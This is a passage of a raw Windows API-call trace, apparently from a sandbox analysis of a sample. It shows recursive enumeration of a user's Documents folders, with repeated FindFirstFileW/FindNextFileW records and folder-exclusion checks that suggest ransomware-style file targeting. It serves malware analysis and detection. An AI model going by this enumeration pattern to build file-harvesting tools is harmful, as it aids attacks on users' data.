ftLastAccessTime.dwLowDateTime=0x87b8dd90, ftLastAccessTime.dwHighDateTime=0x1d57b4f, ftLastWriteTime.dwLowDateTime=0x87b8dd90, ftLastWriteTime.dwHighDateTime=0x1d57b4f, nFileSizeHigh=0x0, nFileSizeLow=0x1524d, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="CIgOY5U5b6Axtcb.docx", cAlternateFileName="CIGOY5~1.DOC")) returned 1 [0028.964] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x10, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0028.964] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbb0c630, ftCreationTime.dwHighDateTime=0x1d59cf6, ftLastAccessTime.dwLowDateTime=0x859ca230, ftLastAccessTime.dwHighDateTime=0x1d58c43, ftLastWriteTime.dwLowDateTime=0x859ca230, ftLastWriteTime.dwHighDateTime=0x1d58c43, nFileSizeHigh=0x0, nFileSizeLow=0x70c8, dwReserved0=0x10, dwReserved1=0x777648, cFileName="H3Wz1PxDd.pptx", cAlternateFileName="H3WZ1P~1.PPT")) returned 1 [0028.964] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ea7d20, ftCreationTime.dwHighDateTime=0x1d57d7e, ftLastAccessTime.dwLowDateTime=0xfd67e2d0, ftLastAccessTime.dwHighDateTime=0x1d5666d, ftLastWriteTime.dwLowDateTime=0xfd67e2d0, ftLastWriteTime.dwHighDateTime=0x1d5666d, nFileSizeHigh=0x0, nFileSizeLow=0xa628, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="hPN6id3lN1N.docx", cAlternateFileName="HPN6ID~1.DOC")) returned 1 [0028.964] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x801ce180, ftCreationTime.dwHighDateTime=0x1d5b646, ftLastAccessTime.dwLowDateTime=0x37ff5ba0, ftLastAccessTime.dwHighDateTime=0x1d5c3fa, ftLastWriteTime.dwLowDateTime=0x37ff5ba0, ftLastWriteTime.dwHighDateTime=0x1d5c3fa, nFileSizeHigh=0x0, nFileSizeLow=0x8860, dwReserved0=0x10, dwReserved1=0x777648, cFileName="iZLE.ods", cAlternateFileName="")) returned 1 [0028.964] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fa86ae0, ftCreationTime.dwHighDateTime=0x1d5c189, ftLastAccessTime.dwLowDateTime=0x4ca0c60, ftLastAccessTime.dwHighDateTime=0x1d5c073, ftLastWriteTime.dwLowDateTime=0x4ca0c60, ftLastWriteTime.dwHighDateTime=0x1d5c073, nFileSizeHigh=0x0, nFileSizeLow=0x5198, dwReserved0=0x10, dwReserved1=0x777648, cFileName="J7ZHze0f-VCkEbN69.rtf", cAlternateFileName="J7ZHZE~1.RTF")) returned 1 [0028.964] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a3078d0, ftCreationTime.dwHighDateTime=0x1d5841f, ftLastAccessTime.dwLowDateTime=0x8dd601b0, ftLastAccessTime.dwHighDateTime=0x1d59271, ftLastWriteTime.dwLowDateTime=0x8dd601b0, ftLastWriteTime.dwHighDateTime=0x1d59271, nFileSizeHigh=0x0, nFileSizeLow=0x18731, dwReserved0=0x10, dwReserved1=0x777648, cFileName="kH1fN.pptx", cAlternateFileName="KH1FN~1.PPT")) returned 1 [0028.964] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x953dec20, ftCreationTime.dwHighDateTime=0x1d5b606, ftLastAccessTime.dwLowDateTime=0xfcfd490, ftLastAccessTime.dwHighDateTime=0x1d5c37b, ftLastWriteTime.dwLowDateTime=0xfcfd490, ftLastWriteTime.dwHighDateTime=0x1d5c37b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x777648, cFileName="LkOIQE-AmAiAINSrD", cAlternateFileName="LKOIQE~1")) returned 1 [0028.964] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0028.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD", cchCount1=17, lpString2="AppData", cchCount2=7) returned 3 [0028.964] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0028.964] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\*", lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x953dec20, ftCreationTime.dwHighDateTime=0x1d5b606, ftLastAccessTime.dwLowDateTime=0xfcfd490, ftLastAccessTime.dwHighDateTime=0x1d5c37b, ftLastWriteTime.dwLowDateTime=0xfcfd490, ftLastWriteTime.dwHighDateTime=0x1d5c37b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2200 [0028.964] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x953dec20, ftCreationTime.dwHighDateTime=0x1d5b606, ftLastAccessTime.dwLowDateTime=0xfcfd490, ftLastAccessTime.dwHighDateTime=0x1d5c37b, ftLastWriteTime.dwLowDateTime=0xfcfd490, ftLastWriteTime.dwHighDateTime=0x1d5c37b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0028.964] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc3b067d0, ftCreationTime.dwHighDateTime=0x1d5b7fb, ftLastAccessTime.dwLowDateTime=0x14f55ae0, ftLastAccessTime.dwHighDateTime=0x1d5bca4, ftLastWriteTime.dwLowDateTime=0x14f55ae0, ftLastWriteTime.dwHighDateTime=0x1d5bca4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="007meSo66", cAlternateFileName="007MES~1")) returned 1 [0028.965] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0028.965] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\*", lpFindFileData=0x6addd8 | out: lpFindFileData=0x6addd8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc3b067d0, ftCreationTime.dwHighDateTime=0x1d5b7fb, ftLastAccessTime.dwLowDateTime=0x14f55ae0, ftLastAccessTime.dwHighDateTime=0x1d5bca4, ftLastWriteTime.dwLowDateTime=0x14f55ae0, ftLastWriteTime.dwHighDateTime=0x1d5bca4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c22c0 [0028.965] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addd8 | out: lpFindFileData=0x6addd8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc3b067d0, ftCreationTime.dwHighDateTime=0x1d5b7fb, ftLastAccessTime.dwLowDateTime=0x14f55ae0, ftLastAccessTime.dwHighDateTime=0x1d5bca4, ftLastWriteTime.dwLowDateTime=0x14f55ae0, ftLastWriteTime.dwHighDateTime=0x1d5bca4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0028.965] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addd8 | out: lpFindFileData=0x6addd8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa250b20, ftCreationTime.dwHighDateTime=0x1d5b933, ftLastAccessTime.dwLowDateTime=0x49e72aa0, ftLastAccessTime.dwHighDateTime=0x1d5b83d, ftLastWriteTime.dwLowDateTime=0x49e72aa0, ftLastWriteTime.dwHighDateTime=0x1d5b83d, nFileSizeHigh=0x0, nFileSizeLow=0xd257, dwReserved0=0x0, dwReserved1=0x777648, cFileName="bQdze 0.odp", cAlternateFileName="BQDZE0~1.ODP")) returned 1 [0028.965] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addc0 | out: lpFindFileData=0x6addc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cad190, ftCreationTime.dwHighDateTime=0x1d5c5b8, ftLastAccessTime.dwLowDateTime=0x19d8b490, ftLastAccessTime.dwHighDateTime=0x1d5b8ed, ftLastWriteTime.dwLowDateTime=0x19d8b490, ftLastWriteTime.dwHighDateTime=0x1d5b8ed, nFileSizeHigh=0x0, nFileSizeLow=0x12790, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="fe6eMKi1FTxh0MxK.rtf", cAlternateFileName="FE6EMK~1.RTF")) returned 1 [0028.965] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addc0 | out: lpFindFileData=0x6addc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fbb0ee0, ftCreationTime.dwHighDateTime=0x1d5bd99, ftLastAccessTime.dwLowDateTime=0xb9c3ef0, ftLastAccessTime.dwHighDateTime=0x1d5bf47, ftLastWriteTime.dwLowDateTime=0xb9c3ef0, ftLastWriteTime.dwHighDateTime=0x1d5bf47, nFileSizeHigh=0x0, nFileSizeLow=0x2e41, dwReserved0=0x10, dwReserved1=0x777648, cFileName="Htr5Pk.odp", cAlternateFileName="")) returned 1 [0028.966] FindNextFileW (in: hFindFile=0x7c22c0, lpFindFileData=0x6addc0 | out: lpFindFileData=0x6addc0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9bc101a0, ftCreationTime.dwHighDateTime=0x1d5c07d, ftLastAccessTime.dwLowDateTime=0x4aacab90, ftLastAccessTime.dwHighDateTime=0x1d5b950, ftLastWriteTime.dwLowDateTime=0x4aacab90, ftLastWriteTime.dwHighDateTime=0x1d5b950, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="JhnEQt", cAlternateFileName="")) returned 1 [0028.966] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0028.966] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\*", lpFindFileData=0x6adb80 | out: lpFindFileData=0x6adb80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9bc101a0, ftCreationTime.dwHighDateTime=0x1d5c07d, ftLastAccessTime.dwLowDateTime=0x4aacab90, ftLastAccessTime.dwHighDateTime=0x1d5b950, ftLastWriteTime.dwLowDateTime=0x4aacab90, ftLastWriteTime.dwHighDateTime=0x1d5b950, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2380 [0028.966] FindNextFileW (in: hFindFile=0x7c2380, lpFindFileData=0x6adb80 | out: lpFindFileData=0x6adb80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9bc101a0, ftCreationTime.dwHighDateTime=0x1d5c07d, ftLastAccessTime.dwLowDateTime=0x4aacab90, ftLastAccessTime.dwHighDateTime=0x1d5b950, ftLastWriteTime.dwLowDateTime=0x4aacab90, ftLastWriteTime.dwHighDateTime=0x1d5b950, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0028.966] FindNextFileW (in: hFindFile=0x7c2380, lpFindFileData=0x6adb80 | out: lpFindFileData=0x6adb80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c542c70, ftCreationTime.dwHighDateTime=0x1d5bccb, ftLastAccessTime.dwLowDateTime=0x14867a70, ftLastAccessTime.dwHighDateTime=0x1d5b728, ftLastWriteTime.dwLowDateTime=0x14867a70, ftLastWriteTime.dwHighDateTime=0x1d5b728, nFileSizeHigh=0x0, nFileSizeLow=0x4911, dwReserved0=0x4, dwReserved1=0x777648, cFileName="BN3xfsXKP2npRmT.ods", cAlternateFileName="BN3XFS~1.ODS")) returned 1 [0028.966] FindNextFileW (in: hFindFile=0x7c2380, lpFindFileData=0x6adb68 | out: lpFindFileData=0x6adb68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb902e950, ftCreationTime.dwHighDateTime=0x1d5c09a, ftLastAccessTime.dwLowDateTime=0x64701b50, ftLastAccessTime.dwHighDateTime=0x1d5c528, ftLastWriteTime.dwLowDateTime=0x64701b50, ftLastWriteTime.dwHighDateTime=0x1d5c528, nFileSizeHigh=0x0, nFileSizeLow=0xa240, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="M6n9gNS1E7rNH.pps", cAlternateFileName="M6N9GN~1.PPS")) returned 1 [0028.966] FindNextFileW (in: hFindFile=0x7c2380, lpFindFileData=0x6adb68 | out: lpFindFileData=0x6adb68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b03a510, ftCreationTime.dwHighDateTime=0x1d5bf45, ftLastAccessTime.dwLowDateTime=0x281b25a0, ftLastAccessTime.dwHighDateTime=0x1d5bbff, ftLastWriteTime.dwLowDateTime=0x281b25a0, ftLastWriteTime.dwHighDateTime=0x1d5bbff, nFileSizeHigh=0x0, nFileSizeLow=0x17561, dwReserved0=0x10, dwReserved1=0x777648, cFileName="pCRLZ1TsEuAv.rtf", cAlternateFileName="PCRLZ1~1.RTF")) returned 1 [0028.966] FindNextFileW (in: hFindFile=0x7c2380, lpFindFileData=0x6adb68 | out: lpFindFileData=0x6adb68*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7a96f40, ftCreationTime.dwHighDateTime=0x1d5c364, ftLastAccessTime.dwLowDateTime=0xd300670, ftLastAccessTime.dwHighDateTime=0x1d5b614, ftLastWriteTime.dwLowDateTime=0xd300670, ftLastWriteTime.dwHighDateTime=0x1d5b614, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x777648, cFileName="PRo_og0ZRj3K", cAlternateFileName="PRO_OG~1")) returned 1 [0028.966] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0028.966] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\*", lpFindFileData=0x6ad928 | out: lpFindFileData=0x6ad928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7a96f40, ftCreationTime.dwHighDateTime=0x1d5c364, ftLastAccessTime.dwLowDateTime=0xd300670, ftLastAccessTime.dwHighDateTime=0x1d5b614, ftLastWriteTime.dwLowDateTime=0xd300670, ftLastWriteTime.dwHighDateTime=0x1d5b614, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2440 [0028.967] FindNextFileW (in: hFindFile=0x7c2440, lpFindFileData=0x6ad928 | out: lpFindFileData=0x6ad928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7a96f40, ftCreationTime.dwHighDateTime=0x1d5c364, ftLastAccessTime.dwLowDateTime=0xd300670, ftLastAccessTime.dwHighDateTime=0x1d5b614, ftLastWriteTime.dwLowDateTime=0xd300670, ftLastWriteTime.dwHighDateTime=0x1d5b614, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0028.967] FindNextFileW (in: hFindFile=0x7c2440, lpFindFileData=0x6ad928 | out: lpFindFileData=0x6ad928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18ea7870, ftCreationTime.dwHighDateTime=0x1d5b8f7, ftLastAccessTime.dwLowDateTime=0xeae0d5a0, ftLastAccessTime.dwHighDateTime=0x1d5c152, ftLastWriteTime.dwLowDateTime=0xeae0d5a0, ftLastWriteTime.dwHighDateTime=0x1d5c152, nFileSizeHigh=0x0, nFileSizeLow=0x18da3, dwReserved0=0x4, dwReserved1=0x777648, cFileName="6v0 IGSxNnE4wY28.pps", cAlternateFileName="6V0IGS~1.PPS")) returned 1 [0028.967] FindNextFileW (in: hFindFile=0x7c2440, lpFindFileData=0x6ad910 | out: lpFindFileData=0x6ad910*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c03bc60, ftCreationTime.dwHighDateTime=0x1d5bcc0, ftLastAccessTime.dwLowDateTime=0xe68a5ae0, ftLastAccessTime.dwHighDateTime=0x1d5c1a1, ftLastWriteTime.dwLowDateTime=0xe68a5ae0, ftLastWriteTime.dwHighDateTime=0x1d5c1a1, nFileSizeHigh=0x0, nFileSizeLow=0x15bf2, dwReserved0=0x10, dwReserved1=0x777648, cFileName="GGg2Vkusl20.xlsx", cAlternateFileName="GGG2VK~1.XLS")) returned 1 [0028.967] FindNextFileW (in: hFindFile=0x7c2440, lpFindFileData=0x6ad910 | out: lpFindFileData=0x6ad910*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5f490840, ftCreationTime.dwHighDateTime=0x1d5c405, ftLastAccessTime.dwLowDateTime=0x6bf13440, ftLastAccessTime.dwHighDateTime=0x1d5bce5, ftLastWriteTime.dwLowDateTime=0x6bf13440, ftLastWriteTime.dwHighDateTime=0x1d5bce5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x777648, cFileName="gTXVbfxNeSRqjbX46", cAlternateFileName="GTXVBF~1")) returned 1 [0028.967] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0028.967] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\*", lpFindFileData=0x6ad6d0 | out: lpFindFileData=0x6ad6d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5f490840, ftCreationTime.dwHighDateTime=0x1d5c405, ftLastAccessTime.dwLowDateTime=0x6bf13440, ftLastAccessTime.dwHighDateTime=0x1d5bce5, ftLastWriteTime.dwLowDateTime=0x6bf13440, ftLastWriteTime.dwHighDateTime=0x1d5bce5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2500 [0028.967] FindNextFileW (in: hFindFile=0x7c2500, lpFindFileData=0x6ad6d0 | out: lpFindFileData=0x6ad6d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5f490840, ftCreationTime.dwHighDateTime=0x1d5c405, ftLastAccessTime.dwLowDateTime=0x6bf13440, ftLastAccessTime.dwHighDateTime=0x1d5bce5, ftLastWriteTime.dwLowDateTime=0x6bf13440, ftLastWriteTime.dwHighDateTime=0x1d5bce5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0028.967] FindNextFileW (in: hFindFile=0x7c2500, lpFindFileData=0x6ad6d0 | out: lpFindFileData=0x6ad6d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ca45520, ftCreationTime.dwHighDateTime=0x1d5c4c9, ftLastAccessTime.dwLowDateTime=0x39aa5d90, ftLastAccessTime.dwHighDateTime=0x1d5c27b, ftLastWriteTime.dwLowDateTime=0x39aa5d90, ftLastWriteTime.dwHighDateTime=0x1d5c27b, nFileSizeHigh=0x0, nFileSizeLow=0x127d4, dwReserved0=0x4, dwReserved1=0x777648, cFileName="bGB2.ods", cAlternateFileName="")) returned 1 [0028.967] FindNextFileW (in: hFindFile=0x7c2500, lpFindFileData=0x6ad6b8 | out: lpFindFileData=0x6ad6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89fa99d0, ftCreationTime.dwHighDateTime=0x1d5b7a0, ftLastAccessTime.dwLowDateTime=0x3ddb67b0, ftLastAccessTime.dwHighDateTime=0x1d5c429, ftLastWriteTime.dwLowDateTime=0x3ddb67b0, ftLastWriteTime.dwHighDateTime=0x1d5c429, nFileSizeHigh=0x0, nFileSizeLow=0x1271, dwReserved0=0x10, dwReserved1=0x777648, cFileName="guwDP36jwcK.doc", cAlternateFileName="GUWDP3~1.DOC")) returned 1 [0028.967] FindNextFileW (in: hFindFile=0x7c2500, lpFindFileData=0x6ad6b8 | out: lpFindFileData=0x6ad6b8*(dwFileAttributes=0x1d60014, ftCreationTime.dwLowDateTime=0x36b820, ftCreationTime.dwHighDateTime=0x6cf858, ftLastAccessTime.dwLowDateTime=0x77391ecd, ftLastAccessTime.dwHighDateTime=0x74852d, ftLastWriteTime.dwLowDateTime=0x21, ftLastWriteTime.dwHighDateTime=0x1cc0015, nFileSizeHigh=0x36b820, nFileSizeLow=0x7c2020, dwReserved0=0x10, dwReserved1=0x777648, cFileName="gu\x08", cAlternateFileName="◨{?jဓĩ\x10")) returned 0 [0028.967] FindClose (in: hFindFile=0x7c2500 | out: hFindFile=0x7c2500) returned 1 [0028.967] FindNextFileW (in: hFindFile=0x7c2440, lpFindFileData=0x6ad910 | out: lpFindFileData=0x6ad910*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x687e6f0, ftCreationTime.dwHighDateTime=0x1d5c14d, ftLastAccessTime.dwLowDateTime=0x802a9bb0, ftLastAccessTime.dwHighDateTime=0x1d5c300, ftLastWriteTime.dwLowDateTime=0x802a9bb0, ftLastWriteTime.dwHighDateTime=0x1d5c300, nFileSizeHigh=0x0, nFileSizeLow=0xbd3b, dwReserved0=0x77744c, dwReserved1=0x777648, cFileName="G_eLJ7pQzi27.doc", cAlternateFileName="G_ELJ7~1.DOC")) returned 1 [0028.967] FindNextFileW (in: hFindFile=0x7c2440, lpFindFileData=0x6ad910 | out: lpFindFileData=0x6ad910*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd2180a0, ftCreationTime.dwHighDateTime=0x1d5c357, ftLastAccessTime.dwLowDateTime=0xf1e66850, ftLastAccessTime.dwHighDateTime=0x1d5bfe6, ftLastWriteTime.dwLowDateTime=0xf1e66850, ftLastWriteTime.dwHighDateTime=0x1d5bfe6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x777648, cFileName="HDwgQZq", cAlternateFileName="")) returned 1 [0028.968] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0028.968] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\*", lpFindFileData=0x6ad6d0 | out: lpFindFileData=0x6ad6d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd2180a0, ftCreationTime.dwHighDateTime=0x1d5c357, ftLastAccessTime.dwLowDateTime=0xf1e66850, ftLastAccessTime.dwHighDateTime=0x1d5bfe6, ftLastWriteTime.dwLowDateTime=0xf1e66850, ftLastWriteTime.dwHighDateTime=0x1d5bfe6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2500 [0028.968] FindNextFileW (in: hFindFile=0x7c2500, lpFindFileData=0x6ad6d0 | out: lpFindFileData=0x6ad6d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd2180a0, ftCreationTime.dwHighDateTime=0x1d5c357, ftLastAccessTime.dwLowDateTime=0xf1e66850, ftLastAccessTime.dwHighDateTime=0x1d5bfe6, ftLastWriteTime.dwLowDateTime=0xf1e66850, ftLastWriteTime.dwHighDateTime=0x1d5bfe6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0028.968] FindNextFileW (in: hFindFile=0x7c2500, lpFindFileData=0x6ad6d0 | out: lpFindFileData=0x6ad6d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef5b7af0, ftCreationTime.dwHighDateTime=0x1d5bcb5, ftLastAccessTime.dwLowDateTime=0x4645edc0, ftLastAccessTime.dwHighDateTime=0x1d5bb0b, ftLastWriteTime.dwLowDateTime=0x4645edc0, ftLastWriteTime.dwHighDateTime=0x1d5bb0b, nFileSizeHigh=0x0, nFileSizeLow=0x3c34, dwReserved0=0x4, dwReserved1=0x777648, cFileName="463pkp6oz8WLE1r.doc", cAlternateFileName="463PKP~1.DOC")) returned 1 [0028.968] FindNextFileW (in: hFindFile=0x7c2500, lpFindFileData=0x6ad6b8 | out: lpFindFileData=0x6ad6b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x180d77d0, ftCreationTime.dwHighDateTime=0x1d5bd8a, ftLastAccessTime.dwLowDateTime=0x764685a0, ftLastAccessTime.dwHighDateTime=0x1d5b8f1, ftLastWriteTime.dwLowDateTime=0x764685a0, ftLastWriteTime.dwHighDateTime=0x1d5b8f1, nFileSizeHigh=0x0, nFileSizeLow=0x8e5a, dwReserved0=0x10, dwReserved1=0x777648, cFileName="cJZMs2vLnTpB5-vCp3UM.pps", cAlternateFileName="CJZMS2~1.PPS")) returned 1 [0028.969] FindNextFileW (in: hFindFile=0x7c2500, lpFindFileData=0x6ad6b8 | out: lpFindFileData=0x6ad6b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24085930, ftCreationTime.dwHighDateTime=0x1d5bb12, ftLastAccessTime.dwLowDateTime=0x29159a40, ftLastAccessTime.dwHighDateTime=0x1d5c1e9, ftLastWriteTime.dwLowDateTime=0x29159a40, ftLastWriteTime.dwHighDateTime=0x1d5c1e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x777648, cFileName="Shrw", cAlternateFileName="")) returned 1 [0028.969] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0028.969] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\*", lpFindFileData=0x6ad478 | out: lpFindFileData=0x6ad478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24085930, ftCreationTime.dwHighDateTime=0x1d5bb12, ftLastAccessTime.dwLowDateTime=0x29159a40, ftLastAccessTime.dwHighDateTime=0x1d5c1e9, ftLastWriteTime.dwLowDateTime=0x29159a40, ftLastWriteTime.dwHighDateTime=0x1d5c1e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c25c0 [0028.969] FindNextFileW (in: hFindFile=0x7c25c0, lpFindFileData=0x6ad478 | out: lpFindFileData=0x6ad478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24085930, ftCreationTime.dwHighDateTime=0x1d5bb12, ftLastAccessTime.dwLowDateTime=0x29159a40, ftLastAccessTime.dwHighDateTime=0x1d5c1e9, ftLastWriteTime.dwLowDateTime=0x29159a40, ftLastWriteTime.dwHighDateTime=0x1d5c1e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0028.969] FindNextFileW (in: hFindFile=0x7c25c0, lpFindFileData=0x6ad478 | out: lpFindFileData=0x6ad478*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76580980, ftCreationTime.dwHighDateTime=0x1d5baac, ftLastAccessTime.dwLowDateTime=0x9d824440, 